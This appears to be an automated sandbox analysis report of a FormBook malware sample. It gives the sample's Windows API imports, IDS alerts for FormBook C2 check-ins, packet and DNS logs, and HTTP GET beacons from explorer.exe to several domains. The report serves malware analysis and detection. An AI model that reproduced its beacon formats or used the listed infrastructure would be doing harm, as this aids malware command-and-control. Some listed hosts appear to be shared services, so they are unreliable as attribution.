KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.934.102.136.18049713802031412 08/22/23-13:43:19.690083	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.9	34.102.136.180
192.168.2.91.1.1.149710802031412 08/22/23-13:42:15.993943	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49710	80	192.168.2.9	1.1.1.1
192.168.2.935.233.138.13249712802031412 08/22/23-13:42:58.501536	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49712	80	192.168.2.9	35.233.138.132
192.168.2.9217.70.184.5049715802031412 08/22/23-13:44:02.774000	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.9	217.70.184.50
192.168.2.966.96.162.12949711802031412 08/22/23-13:42:37.152483	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49711	80	192.168.2.9	66.96.162.129
192.168.2.9188.114.97.749714802031412 08/22/23-13:43:41.839079	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49714	80	192.168.2.9	188.114.97.7
192.168.2.934.149.87.4549716802031412 08/22/23-13:44:28.778609	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.9	34.149.87.45
192.168.2.9107.148.25.12249733802031412 08/22/23-13:45:13.541361	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.9	107.148.25.122

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 22, 2023 13:42:15.976671934 CEST	49710	80	192.168.2.9	1.1.1.1
Aug 22, 2023 13:42:15.993668079 CEST	80	49710	1.1.1.1	192.168.2.9
Aug 22, 2023 13:42:15.993810892 CEST	49710	80	192.168.2.9	1.1.1.1
Aug 22, 2023 13:42:15.993942976 CEST	49710	80	192.168.2.9	1.1.1.1
Aug 22, 2023 13:42:16.010885000 CEST	80	49710	1.1.1.1	192.168.2.9
Aug 22, 2023 13:42:16.013703108 CEST	80	49710	1.1.1.1	192.168.2.9
Aug 22, 2023 13:42:16.013837099 CEST	80	49710	1.1.1.1	192.168.2.9
Aug 22, 2023 13:42:16.013900042 CEST	49710	80	192.168.2.9	1.1.1.1
Aug 22, 2023 13:42:16.013900042 CEST	49710	80	192.168.2.9	1.1.1.1
Aug 22, 2023 13:42:16.030793905 CEST	80	49710	1.1.1.1	192.168.2.9
Aug 22, 2023 13:42:37.041690111 CEST	49711	80	192.168.2.9	66.96.162.129
Aug 22, 2023 13:42:37.152060032 CEST	80	49711	66.96.162.129	192.168.2.9
Aug 22, 2023 13:42:37.152333975 CEST	49711	80	192.168.2.9	66.96.162.129
Aug 22, 2023 13:42:37.152482986 CEST	49711	80	192.168.2.9	66.96.162.129
Aug 22, 2023 13:42:37.258148909 CEST	80	49711	66.96.162.129	192.168.2.9
Aug 22, 2023 13:42:37.276149988 CEST	80	49711	66.96.162.129	192.168.2.9
Aug 22, 2023 13:42:37.276189089 CEST	80	49711	66.96.162.129	192.168.2.9
Aug 22, 2023 13:42:37.276505947 CEST	49711	80	192.168.2.9	66.96.162.129
Aug 22, 2023 13:42:37.276721001 CEST	49711	80	192.168.2.9	66.96.162.129
Aug 22, 2023 13:42:37.382281065 CEST	80	49711	66.96.162.129	192.168.2.9
Aug 22, 2023 13:42:58.336713076 CEST	49712	80	192.168.2.9	35.233.138.132
Aug 22, 2023 13:42:58.500880957 CEST	80	49712	35.233.138.132	192.168.2.9
Aug 22, 2023 13:42:58.501199007 CEST	49712	80	192.168.2.9	35.233.138.132
Aug 22, 2023 13:42:58.501535892 CEST	49712	80	192.168.2.9	35.233.138.132
Aug 22, 2023 13:42:58.665221930 CEST	80	49712	35.233.138.132	192.168.2.9
Aug 22, 2023 13:42:58.665471077 CEST	80	49712	35.233.138.132	192.168.2.9
Aug 22, 2023 13:42:58.665513039 CEST	80	49712	35.233.138.132	192.168.2.9
Aug 22, 2023 13:42:58.665719032 CEST	49712	80	192.168.2.9	35.233.138.132
Aug 22, 2023 13:42:58.665857077 CEST	49712	80	192.168.2.9	35.233.138.132
Aug 22, 2023 13:42:58.829615116 CEST	80	49712	35.233.138.132	192.168.2.9
Aug 22, 2023 13:43:19.674412966 CEST	49713	80	192.168.2.9	34.102.136.180
Aug 22, 2023 13:43:19.689685106 CEST	80	49713	34.102.136.180	192.168.2.9
Aug 22, 2023 13:43:19.689918995 CEST	49713	80	192.168.2.9	34.102.136.180
Aug 22, 2023 13:43:19.690083027 CEST	49713	80	192.168.2.9	34.102.136.180
Aug 22, 2023 13:43:19.705188990 CEST	80	49713	34.102.136.180	192.168.2.9
Aug 22, 2023 13:43:19.819530010 CEST	80	49713	34.102.136.180	192.168.2.9
Aug 22, 2023 13:43:19.819578886 CEST	80	49713	34.102.136.180	192.168.2.9
Aug 22, 2023 13:43:19.820410013 CEST	49713	80	192.168.2.9	34.102.136.180
Aug 22, 2023 13:43:19.820472956 CEST	49713	80	192.168.2.9	34.102.136.180
Aug 22, 2023 13:43:19.844294071 CEST	80	49713	34.102.136.180	192.168.2.9
Aug 22, 2023 13:43:41.821089029 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:43:41.838574886 CEST	80	49714	188.114.97.7	192.168.2.9
Aug 22, 2023 13:43:41.838789940 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:43:41.839078903 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:43:41.856307030 CEST	80	49714	188.114.97.7	192.168.2.9
Aug 22, 2023 13:43:42.186495066 CEST	80	49714	188.114.97.7	192.168.2.9
Aug 22, 2023 13:43:42.186521053 CEST	80	49714	188.114.97.7	192.168.2.9
Aug 22, 2023 13:43:42.186590910 CEST	80	49714	188.114.97.7	192.168.2.9
Aug 22, 2023 13:43:42.186916113 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:43:42.186916113 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:43:42.187005043 CEST	49714	80	192.168.2.9	188.114.97.7
Aug 22, 2023 13:44:02.738617897 CEST	49715	80	192.168.2.9	217.70.184.50
Aug 22, 2023 13:44:02.773525000 CEST	80	49715	217.70.184.50	192.168.2.9
Aug 22, 2023 13:44:02.773785114 CEST	49715	80	192.168.2.9	217.70.184.50
Aug 22, 2023 13:44:02.773999929 CEST	49715	80	192.168.2.9	217.70.184.50
Aug 22, 2023 13:44:02.808708906 CEST	80	49715	217.70.184.50	192.168.2.9
Aug 22, 2023 13:44:02.814177990 CEST	80	49715	217.70.184.50	192.168.2.9
Aug 22, 2023 13:44:02.814225912 CEST	80	49715	217.70.184.50	192.168.2.9
Aug 22, 2023 13:44:02.814245939 CEST	80	49715	217.70.184.50	192.168.2.9
Aug 22, 2023 13:44:02.814483881 CEST	49715	80	192.168.2.9	217.70.184.50
Aug 22, 2023 13:44:02.814532042 CEST	49715	80	192.168.2.9	217.70.184.50
Aug 22, 2023 13:44:28.762764931 CEST	49716	80	192.168.2.9	34.149.87.45
Aug 22, 2023 13:44:28.778274059 CEST	80	49716	34.149.87.45	192.168.2.9
Aug 22, 2023 13:44:28.778462887 CEST	49716	80	192.168.2.9	34.149.87.45
Aug 22, 2023 13:44:28.778609037 CEST	49716	80	192.168.2.9	34.149.87.45
Aug 22, 2023 13:44:28.793787003 CEST	80	49716	34.149.87.45	192.168.2.9
Aug 22, 2023 13:44:28.919048071 CEST	80	49716	34.149.87.45	192.168.2.9
Aug 22, 2023 13:44:28.919085026 CEST	80	49716	34.149.87.45	192.168.2.9
Aug 22, 2023 13:44:28.919332027 CEST	49716	80	192.168.2.9	34.149.87.45
Aug 22, 2023 13:44:28.919378996 CEST	49716	80	192.168.2.9	34.149.87.45
Aug 22, 2023 13:44:28.943342924 CEST	80	49716	34.149.87.45	192.168.2.9
Aug 22, 2023 13:45:13.374234915 CEST	49733	80	192.168.2.9	107.148.25.122
Aug 22, 2023 13:45:13.541038990 CEST	80	49733	107.148.25.122	192.168.2.9
Aug 22, 2023 13:45:13.541172028 CEST	49733	80	192.168.2.9	107.148.25.122
Aug 22, 2023 13:45:13.541361094 CEST	49733	80	192.168.2.9	107.148.25.122
Aug 22, 2023 13:45:13.707973003 CEST	80	49733	107.148.25.122	192.168.2.9
Aug 22, 2023 13:45:13.708733082 CEST	80	49733	107.148.25.122	192.168.2.9
Aug 22, 2023 13:45:13.708760023 CEST	80	49733	107.148.25.122	192.168.2.9
Aug 22, 2023 13:45:13.708934069 CEST	49733	80	192.168.2.9	107.148.25.122
Aug 22, 2023 13:45:13.708992004 CEST	49733	80	192.168.2.9	107.148.25.122
Aug 22, 2023 13:45:13.875713110 CEST	80	49733	107.148.25.122	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 22, 2023 13:42:15.764605999 CEST	57157	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:42:15.970105886 CEST	53	57157	8.8.8.8	192.168.2.9
Aug 22, 2023 13:42:36.908777952 CEST	62310	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:42:37.039114952 CEST	53	62310	8.8.8.8	192.168.2.9
Aug 22, 2023 13:42:58.270390034 CEST	65492	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:42:58.334352016 CEST	53	65492	8.8.8.8	192.168.2.9
Aug 22, 2023 13:43:19.630697012 CEST	53579	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:43:19.672180891 CEST	53	53579	8.8.8.8	192.168.2.9
Aug 22, 2023 13:43:41.773442984 CEST	57846	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:43:41.817755938 CEST	53	57846	8.8.8.8	192.168.2.9
Aug 22, 2023 13:44:02.665364027 CEST	61575	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:44:02.736747980 CEST	53	61575	8.8.8.8	192.168.2.9
Aug 22, 2023 13:44:28.699012041 CEST	62814	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:44:28.760782957 CEST	53	62814	8.8.8.8	192.168.2.9
Aug 22, 2023 13:44:50.920382977 CEST	61972	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:44:50.961489916 CEST	53	61972	8.8.8.8	192.168.2.9
Aug 22, 2023 13:45:13.046680927 CEST	54161	53	192.168.2.9	8.8.8.8
Aug 22, 2023 13:45:13.372400045 CEST	53	54161	8.8.8.8	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 22, 2023 13:42:15.764605999 CEST	192.168.2.9	8.8.8.8	0x3533	Standard query (0)	www.974dp.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:42:36.908777952 CEST	192.168.2.9	8.8.8.8	0xf6de	Standard query (0)	www.bmmboo.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:42:58.270390034 CEST	192.168.2.9	8.8.8.8	0x1334	Standard query (0)	www.ownlegalhelp.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:43:19.630697012 CEST	192.168.2.9	8.8.8.8	0x5b4c	Standard query (0)	www.4tbbwa.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:43:41.773442984 CEST	192.168.2.9	8.8.8.8	0x335a	Standard query (0)	www.ahevrlh.xyz	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:02.665364027 CEST	192.168.2.9	8.8.8.8	0xace2	Standard query (0)	www.thirdmind.network	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:28.699012041 CEST	192.168.2.9	8.8.8.8	0xcd66	Standard query (0)	www.thewhiteorchidspa.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:50.920382977 CEST	192.168.2.9	8.8.8.8	0x2949	Standard query (0)	www.zachmahl.com	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:45:13.046680927 CEST	192.168.2.9	8.8.8.8	0x9055	Standard query (0)	www.uahrbqtj.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 22, 2023 13:42:15.970105886 CEST	8.8.8.8	192.168.2.9	0x3533	No error (0)	www.974dp.com	ha-ppy.happy-sljfs-iiuiuwoe.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:42:15.970105886 CEST	8.8.8.8	192.168.2.9	0x3533	No error (0)	ha-ppy.happy-sljfs-iiuiuwoe.com	happy.zgag-zxxgagugue.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:42:15.970105886 CEST	8.8.8.8	192.168.2.9	0x3533	No error (0)	happy.zgag-zxxgagugue.com		1.1.1.1	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:42:37.039114952 CEST	8.8.8.8	192.168.2.9	0xf6de	No error (0)	www.bmmboo.com		66.96.162.129	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:42:58.334352016 CEST	8.8.8.8	192.168.2.9	0x1334	No error (0)	www.ownlegalhelp.com		35.233.138.132	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:43:19.672180891 CEST	8.8.8.8	192.168.2.9	0x5b4c	No error (0)	www.4tbbwa.com	4tbbwa.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:43:19.672180891 CEST	8.8.8.8	192.168.2.9	0x5b4c	No error (0)	4tbbwa.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:43:41.817755938 CEST	8.8.8.8	192.168.2.9	0x335a	No error (0)	www.ahevrlh.xyz		188.114.97.7	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:43:41.817755938 CEST	8.8.8.8	192.168.2.9	0x335a	No error (0)	www.ahevrlh.xyz		188.114.96.7	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:02.736747980 CEST	8.8.8.8	192.168.2.9	0xace2	No error (0)	www.thirdmind.network	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:44:02.736747980 CEST	8.8.8.8	192.168.2.9	0xace2	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:28.760782957 CEST	8.8.8.8	192.168.2.9	0xcd66	No error (0)	www.thewhiteorchidspa.com	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:44:28.760782957 CEST	8.8.8.8	192.168.2.9	0xcd66	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 22, 2023 13:44:28.760782957 CEST	8.8.8.8	192.168.2.9	0xcd66	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:44:50.961489916 CEST	8.8.8.8	192.168.2.9	0x2949	Name error (3)	www.zachmahl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 22, 2023 13:45:13.372400045 CEST	8.8.8.8	192.168.2.9	0x9055	No error (0)	www.uahrbqtj.cfd		107.148.25.122	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.974dp.com

www.bmmboo.com

www.ownlegalhelp.com

www.4tbbwa.com

www.ahevrlh.xyz

www.thirdmind.network

www.thewhiteorchidspa.com

www.uahrbqtj.cfd

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.9	49710	1.1.1.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:42:15.993942976 CEST	15	OUT	GET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1 Host: www.974dp.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:42:16.013703108 CEST	15	IN	HTTP/1.1 409 Conflict Date: Tue, 22 Aug 2023 11:42:15 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 7faad9f5ee229b34-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.9	49711	66.96.162.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:42:37.152482986 CEST	16	OUT	GET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1 Host: www.bmmboo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:42:37.276149988 CEST	17	IN	HTTP/1.1 302 Found Date: Tue, 22 Aug 2023 11:42:37 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 305 Connection: close Server: Apache/2 Location: https://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi Cache-Control: max-age=3600 Expires: Tue, 22 Aug 2023 12:42:37 GMT Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6d 6d 62 6f 6f 2e 63 6f 6d 2f 73 6e 32 36 2f 3f 6b 4a 42 4c 70 62 38 3d 45 4e 31 37 54 73 41 7a 61 5a 47 35 4f 59 67 62 4b 41 79 68 33 52 68 51 6c 5a 2b 4d 2b 62 48 54 6e 44 49 6c 77 65 41 49 2f 56 54 71 72 54 32 2f 37 5a 31 72 58 6b 76 46 77 65 74 48 79 32 57 42 57 4f 64 39 26 61 6d 70 3b 4d 4c 30 74 6c 3d 4e 5a 6c 70 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.9	49712	35.233.138.132	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:42:58.501535892 CEST	18	OUT	GET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1 Host: www.ownlegalhelp.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:42:58.665471077 CEST	18	IN	HTTP/1.1 302 Found Date: Tue, 22 Aug 2023 11:42:58 GMT Server: Apache Location: https://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi Content-Length: 311 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 77 6e 6c 65 67 61 6c 68 65 6c 70 2e 63 6f 6d 2f 73 6e 32 36 2f 3f 6b 4a 42 4c 70 62 38 3d 61 64 39 63 6d 66 6f 71 43 36 4d 77 6d 51 58 42 33 44 45 68 64 33 46 4b 70 48 4a 6a 39 4d 31 72 75 6d 6b 77 38 52 54 34 62 74 59 48 4f 51 31 72 4c 4b 65 5a 6c 66 36 55 74 4a 5a 75 36 39 48 31 61 4b 36 54 26 61 6d 70 3b 4d 4c 30 74 6c 3d 4e 5a 6c 70 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.9	49713	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:43:19.690083027 CEST	20	OUT	GET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1 Host: www.4tbbwa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:43:19.819530010 CEST	20	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 22 Aug 2023 11:43:19 GMT Content-Type: text/html Content-Length: 291 ETag: "64e2b129-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.9	49714	188.114.97.7	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:43:41.839078903 CEST	21	OUT	GET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1 Host: www.ahevrlh.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 22, 2023 13:43:42.186495066 CEST	22	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Aug 2023 11:43:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=niAMAwxlvWA95QIpUhUVUJLcGS33J%2FBi9wGcg3FG%2Fb%2BTmuDY91rzpYqRzr%2FwLuB%2Fnogc8EePl5AUiE7eHZdQCuucl8RqktnK1%2FmCVX9lR%2BHT6kH7z6Q%2BdmfyPZE1rZTD2gM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7faadc0e7b6a3a7e-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 22, 2023 13:43:42.186521053 CEST	22	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.9	49715	217.70.184.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 22, 2023 13:44:02.773999929 CEST	23	OUT	GET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1 Host: www.thirdmind.network Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
